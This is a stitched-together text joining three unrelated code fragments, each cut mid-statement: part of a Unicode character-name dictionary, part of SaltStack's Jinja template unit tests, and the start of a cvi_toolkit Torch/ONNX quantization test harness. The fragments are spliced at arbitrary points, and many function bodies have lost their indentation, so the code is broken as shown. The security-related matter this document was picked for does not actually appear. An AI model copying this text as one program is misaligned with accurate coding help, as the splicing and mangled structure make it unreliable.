83511: 'ANATOLIAN HIEROGLYPH A515',
83512: 'ANATOLIAN HIEROGLYPH A516',
83513: 'ANATOLIAN HIEROGLYPH A517',
83514: 'ANATOLIAN HIEROGLYPH A518',
83515: 'ANATOLIAN HIEROGLYPH A519',
83516: 'ANATOLIAN HIEROGLYPH A520',
83517: 'ANATOLIAN HIEROGLYPH A521',
83518: 'ANATOLIAN HIEROGLYPH A522',
83519: 'ANATOLIAN HIEROGLYPH A523',
83520: 'ANATOLIAN HIEROGLYPH A524',
83521: 'ANATOLIAN HIEROGLYPH A525',
83522: 'ANATOLIAN HIEROGLYPH A526',
83523: 'ANATOLIAN HIEROGLYPH A527',
83524: 'ANATOLIAN HIEROGLYPH A528',
83525: 'ANATOLIAN HIEROGLYPH A529',
83526: 'ANATOLIAN HIEROGLYPH A530',
128162: 'ANGER SYMBOL',
128544: 'ANGRY FACE',
128551: 'ANGUISHED FACE',
128028: 'ANT',
128246: 'ANTENNA WITH BARS',
128260: 'ANTICLOCKWISE DOWNWARDS AND UPWARDS OPEN CIRCLE ARROWS',
11149: 'ANTICLOCKWISE TRIANGLE-HEADED BOTTOM U-SHAPED ARROW',
11150: 'ANTICLOCKWISE TRIANGLE-HEADED LEFT U-SHAPED ARROW',
11119: 'ANTICLOCKWISE TRIANGLE-HEADED OPEN CIRCLE | |
1040814000,
"1040814000",
)
for object in objects:
response = render_jinja_tmpl(
"{{ object|strftime }}",
dict(
object=object,
opts=self.local_opts,
saltenv="test",
salt=self.local_salt,
),
)
self.assertEqual(response, "2002-12-25")
response = render_jinja_tmpl(
'{{ object|strftime("%b %d, %Y") }}',
dict(
object=object,
opts=self.local_opts,
saltenv="test",
salt=self.local_salt,
),
)
self.assertEqual(response, "Dec 25, 2002")
response = render_jinja_tmpl(
'{{ object|strftime("%y") }}',
dict(
object=object,
opts=self.local_opts,
saltenv="test",
salt=self.local_salt,
),
)
self.assertEqual(response, "02")
def test_non_ascii(self):
    """A template containing non-ASCII characters must round-trip as UTF-8."""
    template_path = os.path.join(self.template_dir, "non_ascii")
    rendered = JINJA(
        template_path, opts=self.local_opts, saltenv="test", salt=self.local_salt
    )
    with salt.utils.files.fopen(rendered["data"], "rb") as handle:
        raw = handle.read()
    result = salt.utils.stringutils.to_unicode(raw, "utf-8")
    expected = salt.utils.stringutils.to_unicode("Assunção" + os.linesep)
    self.assertEqual(expected, result)
def test_get_context_has_enough_context(self):
    """A mid-template line is framed by the default-size context window."""
    template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
    expected = "---\n[...]\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\n[...]\n---"
    actual = salt.utils.stringutils.get_context(template, 8)
    self.assertEqual(expected, actual)
def test_get_context_at_top_of_file(self):
    """Near line 1 the window is clipped at the top (no leading ellipsis)."""
    template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
    expected = "---\n1\n2\n3\n4\n5\n6\n[...]\n---"
    actual = salt.utils.stringutils.get_context(template, 1)
    self.assertEqual(expected, actual)
def test_get_context_at_bottom_of_file(self):
    """Near the last line the window is clipped at the bottom (no trailing ellipsis)."""
    template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
    expected = "---\n[...]\na\nb\nc\nd\ne\nf\n---"
    actual = salt.utils.stringutils.get_context(template, 15)
    self.assertEqual(expected, actual)
def test_get_context_2_context_lines(self):
    """num_lines=2 narrows the window to two lines on each side."""
    template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
    expected = "---\n[...]\n6\n7\n8\n9\na\n[...]\n---"
    actual = salt.utils.stringutils.get_context(template, 8, num_lines=2)
    self.assertEqual(expected, actual)
def test_get_context_with_marker(self):
    """A custom marker string is appended to the targeted line."""
    template = "1\n2\n3\n4\n5\n6\n7\n8\n9\na\nb\nc\nd\ne\nf"
    expected = "---\n[...]\n6\n7\n8 <---\n9\na\n[...]\n---"
    actual = salt.utils.stringutils.get_context(
        template, 8, num_lines=2, marker=" <---"
    )
    self.assertEqual(expected, actual)
def test_render_with_syntax_error(self):
    """A jinja syntax error surfaces as SaltRenderError with a marked context."""
    template = "hello\n\n{{ bad\n\nfoo"
    expected = r".*---\nhello\n\n{{ bad\n\nfoo <======================\n---"
    with self.assertRaisesRegex(SaltRenderError, expected):
        render_jinja_tmpl(
            template,
            {"opts": self.local_opts, "saltenv": "test", "salt": self.local_salt},
        )
@skipIf(six.PY3, "Not applicable to Python 3")
def test_render_with_unicode_syntax_error(self):
    """Under Python 2, non-ASCII bytes in a failing template show up escaped."""
    with patch.object(builtins, "__salt_system_encoding__", "utf-8"):
        template = "hello\n\n{{ bad\n\nfoo한"
        expected = r".*---\nhello\n\n{{ bad\n\nfoo\xed\x95\x9c <======================\n---"
        with self.assertRaisesRegex(SaltRenderError, expected):
            render_jinja_tmpl(
                template,
                {"opts": self.local_opts, "saltenv": "test", "salt": self.local_salt},
            )
def test_render_with_utf8_syntax_error(self):
    """Syntax-error context keeps UTF-8 text intact when that is the system encoding."""
    with patch.object(builtins, "__salt_system_encoding__", "utf-8"):
        template = "hello\n\n{{ bad\n\nfoo한"
        expected = salt.utils.stringutils.to_str(
            r".*---\nhello\n\n{{ bad\n\nfoo한 <======================\n---"
        )
        with self.assertRaisesRegex(SaltRenderError, expected):
            render_jinja_tmpl(
                template,
                {"opts": self.local_opts, "saltenv": "test", "salt": self.local_salt},
            )
def test_render_with_undefined_variable(self):
    """Referencing an undefined variable raises SaltRenderError naming it."""
    template = "hello\n\n{{ foo }}\n\nfoo"
    expected = r"Jinja variable \'foo\' is undefined"
    with self.assertRaisesRegex(SaltRenderError, expected):
        render_jinja_tmpl(
            template,
            {"opts": self.local_opts, "saltenv": "test", "salt": self.local_salt},
        )
def test_render_with_undefined_variable_utf8(self):
    """Undefined-variable error also works when the template holds raw UTF-8 bytes."""
    template = "hello\xed\x95\x9c\n\n{{ foo }}\n\nfoo"
    expected = r"Jinja variable \'foo\' is undefined"
    with self.assertRaisesRegex(SaltRenderError, expected):
        render_jinja_tmpl(
            template,
            {"opts": self.local_opts, "saltenv": "test", "salt": self.local_salt},
        )
def test_render_with_undefined_variable_unicode(self):
    """Undefined-variable error also works with non-ASCII unicode text."""
    template = "hello한\n\n{{ foo }}\n\nfoo"
    expected = r"Jinja variable \'foo\' is undefined"
    with self.assertRaisesRegex(SaltRenderError, expected):
        render_jinja_tmpl(
            template,
            {"opts": self.local_opts, "saltenv": "test", "salt": self.local_salt},
        )
class TestJinjaDefaultOptions(TestCase):
    """Verify that ``jinja_env`` opts (line statement/comment prefixes) are honored."""

    def __init__(self, *args, **kws):
        # NOTE(review): configuration is built in __init__ rather than setUp,
        # mirroring the other test classes in this module.
        TestCase.__init__(self, *args, **kws)
        self.local_opts = {
            "cachedir": os.path.join(RUNTIME_VARS.TMP, "jinja-template-cache"),
            "file_buffer_size": 1048576,
            "file_client": "local",
            "file_ignore_regex": None,
            "file_ignore_glob": None,
            "file_roots": {
                "test": [os.path.join(RUNTIME_VARS.BASE_FILES, "templates")]
            },
            "pillar_roots": {
                "test": [os.path.join(RUNTIME_VARS.BASE_FILES, "templates")]
            },
            "fileserver_backend": ["roots"],
            "hash_type": "md5",
            "extension_modules": os.path.join(
                os.path.dirname(os.path.abspath(__file__)), "extmods"
            ),
            # The options under test: enable "%"-prefixed line statements and
            # "##"-prefixed line comments in the jinja environment.
            "jinja_env": {"line_comment_prefix": "##", "line_statement_prefix": "%"},
        }
        self.local_salt = {
            "myvar": "zero",
            "mylist": [0, 1, 2, 3],
        }

    def test_comment_prefix(self):
        # "##" line comments must be stripped entirely; "%" line statements run.
        template = """
%- set myvar = 'one'
## ignored comment 1
{{- myvar -}}
{%- set myvar = 'two' %} ## ignored comment 2
{{- myvar }} ## ignored comment 3
%- if myvar == 'two':
%- set myvar = 'three'
%- endif
{{- myvar -}}
"""
        rendered = render_jinja_tmpl(
            template, dict(opts=self.local_opts, saltenv="test", salt=self.local_salt)
        )
        self.assertEqual(rendered, "onetwothree")

    def test_statement_prefix(self):
        # "%" line statements must behave exactly like {% ... %} blocks.
        template = """
{%- set mylist = ['1', '2', '3'] %}
%- set mylist = ['one', 'two', 'three']
%- for item in mylist:
{{- item }}
%- endfor
"""
        rendered = render_jinja_tmpl(
            template, dict(opts=self.local_opts, saltenv="test", salt=self.local_salt)
        )
        self.assertEqual(rendered, "onetwothree")
class TestCustomExtensions(TestCase):
def __init__(self, *args, **kws):
    """Build a minimal masterless config pointing file/pillar roots at the test templates."""
    super(TestCustomExtensions, self).__init__(*args, **kws)
    template_root = os.path.join(RUNTIME_VARS.BASE_FILES, "templates")
    self.local_opts = {
        "cachedir": os.path.join(RUNTIME_VARS.TMP, "jinja-template-cache"),
        "file_buffer_size": 1048576,
        "file_client": "local",
        "file_ignore_regex": None,
        "file_ignore_glob": None,
        "file_roots": {"test": [template_root]},
        "pillar_roots": {"test": [template_root]},
        "fileserver_backend": ["roots"],
        "hash_type": "md5",
        "extension_modules": os.path.join(
            os.path.dirname(os.path.abspath(__file__)), "extmods"
        ),
    }
    # Intentionally empty: these tests build their own jinja Environments and
    # do not need any salt dunder functions.
    self.local_salt = {}
def test_regex_escape(self):
    """The ``regex_escape`` filter must behave exactly like ``re.escape``."""
    dataset = "foo?:.*/\\bar"
    env = Environment(extensions=[SerializerExtension])
    env.filters.update(JinjaFilter.salt_jinja_filters)
    template = env.from_string("{{ dataset|regex_escape }}")
    self.assertEqual(template.render(dataset=dataset), re.escape(dataset))
def test_unique_string(self):
    """``unique`` on a string yields the set of its characters."""
    dataset = "foo"
    expected = set(dataset)
    env = Environment(extensions=[SerializerExtension])
    env.filters.update(JinjaFilter.salt_jinja_filters)
    rendered = env.from_string("{{ dataset|unique }}").render(dataset=dataset)
    if not six.PY3:
        # Python 2 renders the repr of the set directly.
        self.assertEqual(rendered, "{0}".format(expected))
    else:
        parts = rendered.strip("'{}").split("', '")
        self.assertEqual(sorted(parts), sorted(list(expected)))
def test_unique_tuple(self):
    """``unique`` on a tuple removes duplicate elements."""
    dataset = ("foo", "foo", "bar")
    expected = set(dataset)
    env = Environment(extensions=[SerializerExtension])
    env.filters.update(JinjaFilter.salt_jinja_filters)
    rendered = env.from_string("{{ dataset|unique }}").render(dataset=dataset)
    if not six.PY3:
        # Python 2 renders the repr of the set directly.
        self.assertEqual(rendered, "{0}".format(expected))
    else:
        parts = rendered.strip("'{}").split("', '")
        self.assertEqual(sorted(parts), sorted(list(expected)))
def test_unique_list(self):
    """``unique`` on a list keeps first occurrences in order."""
    dataset = ["foo", "foo", "bar"]
    expected = ["foo", "bar"]
    env = Environment(extensions=[SerializerExtension])
    env.filters.update(JinjaFilter.salt_jinja_filters)
    rendered = env.from_string("{{ dataset|unique }}").render(dataset=dataset)
    if not six.PY3:
        # Python 2 renders the repr of the list directly.
        self.assertEqual(rendered, "{0}".format(expected))
    else:
        parts = rendered.strip("'[]").split("', '")
        self.assertEqual(parts, expected)
def test_serialize_json(self):
    """The ``json`` filter must emit a string that parses back to the input."""
    dataset = {"foo": True, "bar": 42, "baz": [1, 2, 3], "qux": 2.0}
    env = Environment(extensions=[SerializerExtension])
    serialized = env.from_string("{{ dataset|json }}").render(dataset=dataset)
    self.assertEqual(dataset, salt.utils.json.loads(serialized))
def test_serialize_yaml(self):
    """The ``yaml`` filter must emit YAML that safe-loads back to the input."""
    dataset = {
        "foo": True,
        "bar": 42,
        "baz": [1, 2, 3],
        "qux": 2.0,
        "spam": OrderedDict([("foo", OrderedDict([("bar", "baz"), ("qux", 42)]))]),
    }
    env = Environment(extensions=[SerializerExtension])
    serialized = env.from_string("{{ dataset|yaml }}").render(dataset=dataset)
    self.assertEqual(dataset, salt.utils.yaml.safe_load(serialized))
def test_serialize_yaml_str(self):
    """A plain string passes through the ``yaml`` filter unchanged."""
    dataset = "str value"
    env = Environment(extensions=[SerializerExtension])
    serialized = env.from_string("{{ dataset|yaml }}").render(dataset=dataset)
    self.assertEqual(dataset, serialized)
def test_serialize_yaml_unicode(self):
    """The ``yaml`` filter renders a unicode string unchanged."""
    dataset = "str value"
    env = Environment(extensions=[SerializerExtension])
    rendered = env.from_string("{{ dataset|yaml }}").render(dataset=dataset)
    if not six.PY3:
        # On Python 2 (notably CentOS 6 / 2.7) a quirk in the equality handler
        # makes direct comparison unreliable, so assert the content and the
        # unicode type separately.
        self.assertIn("str value", rendered)
        self.assertIsInstance(rendered, six.text_type)
    else:
        self.assertEqual("str value", rendered)
def test_serialize_python(self):
    """The ``python`` filter must match ``pprint.pformat`` output."""
    dataset = {"foo": True, "bar": 42, "baz": [1, 2, 3], "qux": 2.0}
    env = Environment(extensions=[SerializerExtension])
    serialized = env.from_string("{{ dataset|python }}").render(dataset=dataset)
    self.assertEqual(serialized, pprint.pformat(dataset))
def test_load_yaml(self):
    """``load_yaml`` parses string input; non-string input is an error."""
    env = Environment(extensions=[SerializerExtension])
    rendered = env.from_string(
        '{% set document = "{foo: it works}"|load_yaml %}{{ document.foo }}'
    ).render()
    self.assertEqual(rendered, "it works")

    template = "{% set document = document|load_yaml %}" "{{ document.foo }}"
    rendered = env.from_string(template).render(document="{foo: it works}")
    self.assertEqual(rendered, "it works")

    # Feeding an already-parsed mapping must fail.
    with self.assertRaises((TypeError, exceptions.TemplateRuntimeError)):
        env.from_string(template).render(document={"foo": "it works"})
def test_load_tag(self):
    """{% load_yaml %}/{% load_json %} blocks expose parsed data; bad input raises."""
    env = Environment(extensions=[SerializerExtension])
    source = (
        "{{ bar }}, "
        + "{% load_yaml as docu %}{foo: it works, {{ bar }}: baz}{% endload %}"
        + "{{ docu.foo }}"
    )
    self.assertEqual(env.from_string(source).render(bar="barred"), "barred, it works")

    source = (
        '{{ bar }}, {% load_json as docu %}{"foo": "it works", "{{ bar }}": "baz"}{% endload %}'
        + "{{ docu.foo }}"
    )
    self.assertEqual(env.from_string(source).render(bar="barred"), "barred, it works")

    # "load_yamle" is intentionally misspelled: an unknown tag is a syntax error.
    with self.assertRaises(exceptions.TemplateSyntaxError):
        env.from_string(
            "{% load_yamle as document %}{foo, bar: it works}{% endload %}"
        ).render()
    # Invalid JSON inside a load_json block fails at runtime.
    with self.assertRaises(exceptions.TemplateRuntimeError):
        env.from_string(
            "{% load_json as document %}{foo, bar: it works}{% endload %}"
        ).render()
def test_load_json(self):
    """``load_json`` parses valid JSON strings and rejects everything else."""
    env = Environment(extensions=[SerializerExtension])
    rendered = env.from_string(
        '{% set document = \'{"foo": "it works"}\'|load_json %}'
        "{{ document.foo }}"
    ).render()
    self.assertEqual(rendered, "it works")

    template = "{% set document = document|load_json %}" "{{ document.foo }}"
    rendered = env.from_string(template).render(document='{"foo": "it works"}')
    self.assertEqual(rendered, "it works")

    # Single quotes are not valid JSON.
    with self.assertRaises(exceptions.TemplateRuntimeError):
        env.from_string("{{ document|load_json }}").render(
            document="{'foo': 'it works'}"
        )
    # Non-string input must fail too.
    with self.assertRaises(exceptions.TemplateRuntimeError):
        env.from_string("{{ document|load_json }}").render(
            document={"foo": "it works"}
        )
def test_load_yaml_template(self):
    """``import_yaml`` pulls a YAML document out of the loader by name."""
    loader = DictLoader({"foo": '{bar: "my god is blue", foo: [1, 2, 3]}'})
    env = Environment(extensions=[SerializerExtension], loader=loader)
    rendered = env.from_string('{% import_yaml "foo" as doc %}{{ doc.bar }}').render()
    self.assertEqual(rendered, "my god is blue")
    # Missing templates must raise, not silently render empty.
    with self.assertRaises(exceptions.TemplateNotFound):
        env.from_string('{% import_yaml "does not exists" as doc %}').render()
def test_load_json_template(self):
    """``import_json`` pulls a JSON document out of the loader by name."""
    loader = DictLoader({"foo": '{"bar": "my god is blue", "foo": [1, 2, 3]}'})
    env = Environment(extensions=[SerializerExtension], loader=loader)
    rendered = env.from_string('{% import_json "foo" as doc %}{{ doc.bar }}').render()
    self.assertEqual(rendered, "my god is blue")
    # Missing templates must raise, not silently render empty.
    with self.assertRaises(exceptions.TemplateNotFound):
        env.from_string('{% import_json "does not exists" as doc %}').render()
def test_load_text_template(self):
    """``import_text`` imports the raw text of a template."""
    loader = DictLoader({"foo": "Foo!"})
    env = Environment(extensions=[SerializerExtension], loader=loader)
    rendered = env.from_string('{% import_text "foo" as doc %}{{ doc }}').render()
    self.assertEqual(rendered, "Foo!")
    # Missing templates must raise, not silently render empty.
    with self.assertRaises(exceptions.TemplateNotFound):
        env.from_string('{% import_text "does not exists" as doc %}').render()
def test_catalog(self):
loader = DictLoader(
{
"doc1": '{bar: "my god is blue"}',
"doc2": '{% import_yaml "doc1" as local2 %} never exported',
"doc3": '{% load_yaml as local3 %}{"foo": "it works"}{% endload %} me neither',
"main1": '{% from "doc2" import local2 %}{{ local2.bar }}',
"main2": '{% from "doc3" import local3 %}{{ local3.foo }}',
"main3": """
{% import "doc2" as imported2 %}
{% import "doc3" as imported3 %}
{{ imported2.local2.bar }}
""",
"main4": """
{% import "doc2" as imported2 %}
{% import "doc3" as imported3 %}
{{ imported3.local3.foo }}
| |
<gh_stars>1-10
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from cvi_toolkit.model.mlir_model import MLIRModel
from cvi_toolkit.utils.mlir_shell import mlir_quant, \
mlir_opt, mlir_to_cvimodel, run_cvimodel
from cvi_toolkit.numpy_helper import npz_compare
from cvi_toolkit.transform.onnx_converter import OnnxConverter
from cvi_toolkit.numpy_helper.npz_compare import fp32_to_bf16
import onnx
from onnx import helper
from onnx import TensorProto
import onnxruntime
import pyruntime
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
from torch.distributions import Normal
import numpy as np
import os
import sys
import gc
import re
# Torch operators exercised by the IR regression suite. Commented-out entries
# are not supported by the converter yet; trailing notes record known caveats
# for entries that are enabled but fragile.
TEST_TORCH_IR = [
    "Activation",
    "AvgPool",
    "AdaptiveAvgPool2d",  # input_size % output_size == 0
    # "Bilinear", ## Bilinear not support
    "Batch_Norm",  ## Batch_norm_2d and Instance_Norm_2d easily will fail
    "Conv3d",  # support Conv with 3d, 2d, 1d case
    "ConvTranspose",
    "Cat_Chunk",
    "Clip",
    "ConstantPad",
    # "ChannelShuffle", ## ChannelShuffle not support
    # "Dropout", ## Dropout not support
    "Expand",
    "Flatten",  ## Unflatten not support
    "GRU",
    "Identity",
    "Log",
    "LSTM",
    "LayerNorm",
    "Linear",
    "LogSigmoid",  # sometimes fails
    "LogSoftmax",
    # "Mulit_attention_api", ## now not support
    "MaxPool",  ## Maxpool_1d and Max_Un_Pool2d not support
    "MaxPool3d",
    "Max_Min",
    "Math",  ## sum, prod not support
    "masked_fill",
    "Norm",
    "MulSubConstant5d",
    "Multi_input",
    "Pow",
    "Repeat",  ## repeat_interleave onnx not support
    "ReflectionPad",  ## ReflectionPad_2d not support
    "Std",
    "Squeeze",
    "Size",
    "Sum",
    "Scale",
    "SiLU",
    # "Unfold", ## Unfold not support
    "Upsample",
    "ZeroPad2d",
]
# IR names excluded from specific quantization/test flows ("" = no exclusions).
NOT_SUPPORT_CMDBUF_TEST_IR = [""]
NOT_SUPPORT_BF16_TEST_IR = [""]
NOT_SUPPORT_INT8_TEST_IR = ["masked_fill"]  # just to save test time
def cvimodel_inference(inputs, model_name):
    """Run a compiled cvimodel and collect its outputs.

    Input arrays are cast according to the quantization suffix on each input
    tensor name before being copied into the runtime buffers.

    :param inputs: mapping of input tensor name -> numpy array
    :param model_name: path of the .cvimodel file to load
    :return: mapping of output tensor name -> numpy array
    """
    model = pyruntime.Model(model_name)
    for tensor in model.inputs:
        name = tensor.name
        data = inputs[name]
        if name.endswith('_quant_i8'):
            data = data.astype(np.int8)
        elif name.endswith('_quant_u16'):
            data = data.astype(np.uint16)
        elif name.endswith('_quant_i16'):
            data = data.astype(np.int16)
        elif name.endswith('_quant_bf16'):
            data = fp32_to_bf16(data)
        tensor.data[:] = data.reshape(tensor.data.shape)
    model.forward()
    return {out.name: np.array(out.data) for out in model.outputs}
def get_chip_name():
    """Return the target chip from the SET_CHIP_NAME environment variable.

    Falls back to "cv183x" (with a warning on stderr) when the variable is
    unset or empty.

    :return: chip name string, e.g. "cv183x"
    """
    runchip = os.environ.get('SET_CHIP_NAME', None)
    if not runchip:
        # BUG FIX: the previous code called ``log.warning`` but no ``log``
        # object exists in this module, so the fallback path raised NameError.
        # Emit the warning without crashing instead.
        print("no found SET_CHIP_NAME environment value, set 183x as default",
              file=sys.stderr)
        return "cv183x"
    return runchip
def make_test_calibration_table(tensors, table_name):
    """Write a naive calibration table for testing.

    Each line has the form ``<tensor name> <threshold>`` where the threshold
    is ``1.1 * max(abs(tensor)) + 0.01`` so every value is inside the range.

    :param tensors: mapping of tensor name -> numpy array
    :param table_name: path of the table file to write
    """
    with open(table_name, 'w') as table:
        for name in tensors:
            threshold = 1.1 * max(np.abs(tensors[name].flatten())) + 0.01
            table.write("{} {}\n".format(name, threshold))
def _fill_inputs(ort_session, inputs):
inodes = ort_session.get_inputs()
if len(inodes) == 1:
dtype = np.int64 if inodes[0].type == 'tensor(int64)' \
else np.float32
return {inodes[0].name: inputs.astype(dtype)}
# inputs is map
assert(len(inodes) == len(inputs))
data = {}
for i in range(len(inodes)):
name = inodes[i].name
dtype = np.int64 if inodes[i].type == 'tensor(int64)' \
else np.float32
data[name] = inputs[name].astype(dtype)
return data
def _onnx_inference(inputs, model_name, input_name="input", input_cb=None):
    """Run an ONNX model through onnxruntime.

    :param inputs: array (single-input model) or name->array mapping
    :param model_name: path to the .onnx file
    :param input_name: unused legacy parameter, kept for interface stability
    :param input_cb: optional callback building the feed dict itself;
        called as ``input_cb(model_name, "onnx", inputs)``
    :return: mapping of output name -> numpy array
    """
    ort_session = onnxruntime.InferenceSession(model_name)
    if callable(input_cb):
        # BUG FIX: this previously passed the ``input`` builtin instead of
        # the ``inputs`` argument, handing the callback a function object.
        ort_inputs = input_cb(model_name, "onnx", inputs)
    else:
        ort_inputs = _fill_inputs(ort_session, inputs)
    outs = ort_session.run(None, ort_inputs)
    outputs = {}
    for idx, output in enumerate(ort_session.get_outputs()):
        outputs[output.name] = outs[idx]
    return outputs
def onnx_inference(input, model_def, input_cb = None):
    """Public wrapper over :func:`_onnx_inference`; forwards input and callback."""
    return _onnx_inference(input, model_def, input_cb=input_cb)
class TORCH_IR_TESTER(object):
def __init__(self):
    """Set up the per-IR test dispatch table and default to int8 quantization."""
    # converter is created lazily by the individual tests.
    self.converter = None
    # When True, quantized cvimodels are also built and executed.
    self.cvi_model_test = True
    # Dispatch table: IR name (see TEST_TORCH_IR) -> test method.
    self.test_function = {
        "Activation": self.test_Activation,
        "AvgPool": self.test_AvgPool,
        "AdaptiveAvgPool2d": self.test_AdaptiveAvgPool2d,
        "Batch_Norm": self.test_Batch_Norm,
        "Bilinear": self.test_Bilinear,
        "Conv3d": self.test_Conv3d,
        "ConvTranspose": self.test_ConvTranspose,
        "Cat_Chunk": self.test_Cat_Chunk,
        "Clip": self.test_Clip,
        "ConstantPad": self.test_ConstantPad,
        "ChannelShuffle": self.test_ChannelShuffle,
        "Dropout": self.test_Dropout,
        "Expand": self.test_Expand,
        "Flatten": self.test_Flatten,
        "GRU": self.test_GRU,
        "Identity": self.test_Identity,
        "Log": self.test_Log,
        "LogSigmoid": self.test_LogSigmoid,
        "LogSoftmax": self.test_LogSoftmax,
        "LayerNorm": self.test_LayerNorm,
        "Linear": self.test_Linear,
        "LSTM": self.test_LSTM,
        "MaxPool": self.test_MaxPool,
        "MaxPool3d": self.test_MaxPool3d,
        "Math": self.test_Math,
        "masked_fill": self.test_masked_fill,
        "Mulit_attention_api": self.test_Mulit_attention_api,
        "MulSubConstant5d": self.test_MulSubConstant5d,
        "Multi_input": self.test_Multi_input,
        "Max_Min": self.test_Max_Min,
        "Norm": self.test_Norm,
        "Pow": self.test_Pow,
        "Repeat": self.test_Repeat,
        "ReflectionPad": self.test_ReflectionPad,
        "Std": self.test_Std,
        "Scale": self.test_Scale,
        "Squeeze": self.test_Squeeze,
        "Size": self.test_Size,
        "SiLU": self.test_SiLU,
        "Sum": self.test_Sum,
        "Unfold": self.test_Unfold,
        "Upsample": self.test_Upsample,
        "ZeroPad2d": self.test_ZeroPad2d,
    }
    self.set_quant_mode()
def set_quant_mode(self, mode="int8"):
    """Select the quantization mode; only "int8" and "bf16" are accepted.

    :raises RuntimeError: for any other mode string
    """
    if mode not in ("int8", "bf16"):
        raise RuntimeError("Not support quant mode {}".format(mode))
    self.quant_mode = mode
def onnx_convert_and_infernece(self, inputs, model_name, torch_output):
    """Convert ``<model_name>.onnx`` to MLIR, quantize it (per self.quant_mode),
    compile a cvimodel, and cross-check outputs at every stage.

    :param inputs: torch tensor or tuple of tensors fed to the model
    :param model_name: base name used for every generated artifact
    :param torch_output: reference output(s) from the torch model
    :raises RuntimeError: when quantization or cvimodel generation fails
    """
    fp32_mlir = "{}.mlir".format(model_name)
    model_def = model_name + '.onnx'
    converter = OnnxConverter(model_name, model_def, fp32_mlir, batch_size=0)
    converter.run()
    del converter
    gc.collect()

    # Persist the network inputs so external tools can replay them.
    input_npz = "{}_in_fp32.npz".format(model_name)
    if isinstance(inputs, tuple):
        input_data = {}
        for i in range(len(inputs)):
            key = "in_{}".format(i)
            input_data[key] = inputs[i].data.numpy().astype(np.float32)
        np.savez(input_npz, **input_data)
    else:
        input_data = inputs.data.numpy().astype(np.float32)
        np.savez(input_npz, input=input_data)
    onnx_outs = onnx_inference(input_data, model_def)
    num_outputs = len(onnx_outs)

    # Step 1: torch reference vs ONNX runtime.
    if num_outputs == 1:
        onnx_out = list(onnx_outs.values())[0]
        np.testing.assert_allclose(torch_output.flatten(), onnx_out.flatten(), rtol=1e-5, atol=1e-01)
    else:
        assert(len(torch_output) == num_outputs)
        keys = list(onnx_outs)
        for i in range(num_outputs):
            print("==> Torch vs Onnx, at[{}]".format(i))
            np.testing.assert_allclose(torch_output[i].data.numpy().flatten(), onnx_outs[keys[i]].flatten(), rtol=1e-5, atol=1e-01)

    # Step 2: FP32 MLIR vs ONNX runtime.
    fp32_opt_mlir = "{}_opt.mlir".format(model_name)
    fp32_csv = "{}_fp32.csv".format(model_name)
    mlir_opt(fp32_mlir, fp32_opt_mlir, fp32_csv)
    self.mlir_model = None
    self.mlir_model = MLIRModel()
    self.mlir_model.load_model(fp32_opt_mlir)
    mlir_outs = self.mlir_model.inference(input_data)
    fp32_tensors = self.mlir_model.get_all_tensor()
    assert(len(mlir_outs) == num_outputs)
    if num_outputs > 1:
        # MLIR output names carry an op-type suffix (e.g. "_Gemm"); strip it
        # to recover the matching ONNX output name.
        patten = re.compile(r"_[A-Z]\w+?$")
        for name in mlir_outs:
            onnx_name = patten.sub("", name)
            print("Compare mlir[{}] : onnx[{}]".format(name, onnx_name))
            np.testing.assert_allclose(mlir_outs[name].flatten(), onnx_outs[onnx_name].flatten(), rtol=1e-5, atol=1e-01)
    else:
        if isinstance(mlir_outs, dict):
            mlir_outs = list(mlir_outs.values())[0]
        onnx_out = onnx_outs.popitem()[1]
        np.testing.assert_allclose(mlir_outs.flatten(), onnx_out.flatten(), rtol=1e-5, atol=1e-01)
    print("Compare Torch and Onnx success")
    mlir_npz = "{}_fp32.npz".format(model_name)
    np.savez(mlir_npz, **fp32_tensors)

    # Step 3: quantize, compile and run the cvimodel.
    tensors = self.mlir_model.get_all_tensor()
    if self.quant_mode == "int8":
        for i in NOT_SUPPORT_INT8_TEST_IR:
            if i == model_name:
                print("{} not support int8 test!".format(model_name))
                # BUG FIX: previously this only printed and fell through,
                # running the int8 flow anyway; mirror the bf16 branch and
                # skip the model.
                return
        table_name = "{}_cali_table".format(model_name)
        # gen cali table
        make_test_calibration_table(tensors, table_name)
        # quant
        quant_mlir = "{}_quant_int8.mlir".format(model_name)
        int8_csv = "{}_int8.csv".format(model_name)
        chip = get_chip_name()
        ret = mlir_quant(fp32_opt_mlir, quant_mlir, chip,
                         int8_csv, calib_table=table_name, quantize="int8")
        if ret < 0: raise RuntimeError("tpu_quant failed")
        # get mlir output
        del self.mlir_model
        self.mlir_model = MLIRModel()
        self.mlir_model.load_model(quant_mlir)
        mlir_int8_outs = self.mlir_model.inference(input_data)
        assert(len(mlir_int8_outs) == num_outputs)
        int8_tensors = self.mlir_model.get_all_tensor()
        ref_npz = "{}_all_tensor_int8_mlir.npz".format(model_name)
        np.savez(ref_npz, **int8_tensors)
        npz_compare([ref_npz, mlir_npz, "--tolerance",
                     "0.6,0.6,0.5", "--dequant", "--op_info", int8_csv])
        # gen cvimodel
        cvimodel = "{}_int8.cvimodel".format(model_name)
        ret = mlir_to_cvimodel(quant_mlir, cvimodel, inputs_type="SAME", outputs_type="FP32")
        if ret < 0: raise RuntimeError("gen_cvimodel failed")
        # run cvi_model
        output_tensor_npz = "{}_all_tensor_int8_cvi.npz".format(model_name)
        cvi_outs = cvimodel_inference(int8_tensors, cvimodel)
        assert(len(cvi_outs) == num_outputs)
        for name in cvi_outs:
            if name not in int8_tensors:
                raise RuntimeError("cvimodel output name not correct")
        np.savez(output_tensor_npz, **cvi_outs)
        npz_compare([output_tensor_npz, ref_npz,
                     "--tolerance", "0.99,0.99,0.90"])
    elif self.quant_mode == "bf16":
        for i in NOT_SUPPORT_BF16_TEST_IR:
            if i == model_name:
                print("{} not support bf16 test!".format(model_name))
                return
        # opt
        fp32_opt_mlir = "{}_opt_bf16.mlir".format(model_name)
        fp32_csv = "{}_fp32.csv".format(model_name)
        mlir_opt(fp32_mlir, fp32_opt_mlir, fp32_csv)
        bf16_csv = "{}_bf16.csv".format(model_name)
        # quant
        quant_mlir = "{}_quant_bf16.mlir".format(model_name)
        chip = get_chip_name()
